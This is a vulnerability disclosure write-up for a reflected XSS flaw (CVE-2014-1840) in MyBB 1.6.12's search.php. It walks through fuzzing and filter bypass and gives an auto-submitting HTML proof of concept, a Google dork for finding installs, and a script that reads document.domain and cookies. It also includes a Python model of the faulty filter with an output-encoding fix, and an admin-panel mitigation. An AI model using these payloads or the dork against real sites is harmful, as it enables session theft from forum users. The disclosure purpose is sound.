MyBB 1.6.12 POST XSS 0day

This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was the input I gave:

alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws a SQL error:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'
AND (  LOWER(t.subject) LIKE '%&lt;foo&gt; &lt;h1&gt; &lt;script&gt; alert (bar) () ; //%'  LOWER(t.subject)
LIKE '%&gt; &lt; prompt \x41 \%42 constructor onload%')


This made me analyze and reverse the behaviour to find the cause. After narrowing the input down, this was the minimal input that causes the error.

This part must stay constant: or'(“\

To reproduce this issue you can add any one character in front of or'(“\ and two characters after or'(“\, and you cannot have any spaces in between them.

This will be the skeleton:

[1 char value]or'(“\[2 char values]

Examples:

1or'(“\00

qor'(“\2a

You can also have a space, like this:

qor'(“\ a

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1
AND t.closed NOT LIKE 'moved|%'  AND (  LOWER(t.subject)
LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')


How to Inject JavaScript and HTML?

We can inject HTML + JavaScript, but search.php filters out the ‘ “ [] – characters. This is the method you can use to inject your payload. If we keep our constant in the middle we can place our payload in front of it and after it. If we inject in front of the constant, the payload is stored in this manner:

<Payload here>qor'(“\2a

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')

For example, if we inject an HTML heading at the beginning:

<h1>Osanda</h1>qor'(“\2a

It will look like this inside the source:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%<h1>Osanda</h1>>qor (%'  LOWER(t.subject) LIKE '%\2a%')


Now if we inject after the constant, the payload is stored in two places in the source.

qor'(“\2a

The first place is the SQL error message itself:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 
'LOWER(t.subject) LIKE '%\2a%')' at line 3

The second place is inside the query.

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1        
AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')


This is an example of JavaScript being interpreted: alert(/Osanda/). Notice that our string is converted to lower case characters because the query wraps the subject in LOWER().


Remember that this filters out the ‘ “ [] — characters. Therefore we can use an external script source for performing further client-side attacks.
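The root cause described above is that the failing query, containing the filtered keyword, is echoed into the error page without HTML encoding, so a character blacklist alone cannot stop markup from reaching the browser. The following is an added Python example, not MyBB's code and not from the original post: it models the character-stripping filter the write-up describes (straight and curly quotes, square brackets, dashes, plus the LOWER() lowercasing), rebuilds the LIKE clause shape shown in the error output, and renders the error page once verbatim and once with context-aware output encoding. The function names, the STRIPPED_CHARS set and the sample keywords are assumptions constructed for the example.

```python
import html

# Model of the characters the write-up says search.php strips from the keyword
# input (straight/curly quotes, square brackets, dashes). This is a constructed
# approximation of the described behaviour, not MyBB's own filter.
STRIPPED_CHARS = set("'\"[]-" + "\u2018\u2019\u201c\u201d\u2013\u2014")

# Constructed sample inputs: a benign search and the keyword shape from the post.
SAMPLE_KEYWORDS = {
    "benign": "mybb 1.6.12 search",
    "payload": "qor'(\"\\2a<script>alert(/XSS/)</script>",
}


def keyword_filter(keywords: str) -> str:
    """Blacklist filter model: drop the listed characters and lowercase the
    remainder (the query wraps the subject in LOWER(), which is why the echoed
    string appears in lower case in the post's screenshots)."""
    return "".join(ch for ch in keywords if ch not in STRIPPED_CHARS).lower()


def build_like_query(filtered_keywords: str) -> str:
    """Rebuild the LIKE-clause shape seen in the post's error output."""
    return (
        "SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 "
        "AND t.closed NOT LIKE 'moved|%' "
        f"AND ( LOWER(t.subject) LIKE '%{filtered_keywords}%' )"
    )


def render_error_unsafe(failed_query: str) -> str:
    """Error page that echoes the failing query verbatim into HTML: this is the
    reflected-XSS sink the post describes."""
    return f"<p>SQL error near:</p><pre>{failed_query}</pre>"


def render_error_safe(failed_query: str) -> str:
    """Same page with HTML output encoding applied: any markup inside the
    query text becomes inert text, whatever the input filter let through."""
    return f"<p>SQL error near:</p><pre>{html.escape(failed_query, quote=True)}</pre>"


def has_active_markup(page: str) -> bool:
    """Crude illustrative check: does the rendered page still contain a raw
    <script tag that a browser would execute?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, raw in SAMPLE_KEYWORDS.items():
        query = build_like_query(keyword_filter(raw))
        print(name,
              "unsafe page executes script:", has_active_markup(render_error_unsafe(query)),
              "| encoded page executes script:", has_active_markup(render_error_safe(query)))
```

The blacklist removes the quote and bracket characters but leaves `<script>` intact, so the verbatim error page still carries executable markup; the encoded page does not. The fix belongs at the output sink (encode the query when rendering the error, or do not render the query to users at all), not in the input filter.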

Proof of Concept


<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: February 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
E-Mail: osandajayathissa[at]gmail.com
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Video: https://www.youtube.com/watch?v=67MfgixmWgo
Original write-up: https://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
CVE: CVE-2014-1840
-->
  <body>
    <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
      <input type="hidden" name="action" value="do_search" />
      <input type="hidden" name="keywords" value="qor&apos;(&quot;\2a&lt;script&gt;alert(/XSS/)&lt;/script&gt; " />
    <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>


You could do something creative like this in an external script source to read the domain and cookies and go beyond the filters. You can define your source like this:

qor'("\2a

This is the content of the poc file:

// Build the page in one string expression; a literal line break inside a
// quoted string is a syntax error, so the pieces are joined with +
document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/>' +
  '<h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie);
alert('XSS by Osanda & HR');


Thanks to Hood3dRob1n for this idea 🙂

I have no idea how to inject SQL through this bug. You may give it a try and see.

Update:

FIX

To protect against this you can disable the “Standard” search and enable the “Full Text” option in the Admin CP.
Steps to do this:

  • Login to the Admin CP
  • Click Configuration -> Search Settings
  • Choose “Full Text” as the Search type and click Save Setting

Thanks to Cake for reminding me of this.


Advisories

CVE-2014-1840
http://www.osvdb.org/show/osvdb/102937
http://secunia.com/advisories/56680/
http://packetstormsecurity.com/files/125038/MyBB-1.6.12-POST-Cross-Site-Scripting.html
http://www.tenable.com/pvs-plugins/8629
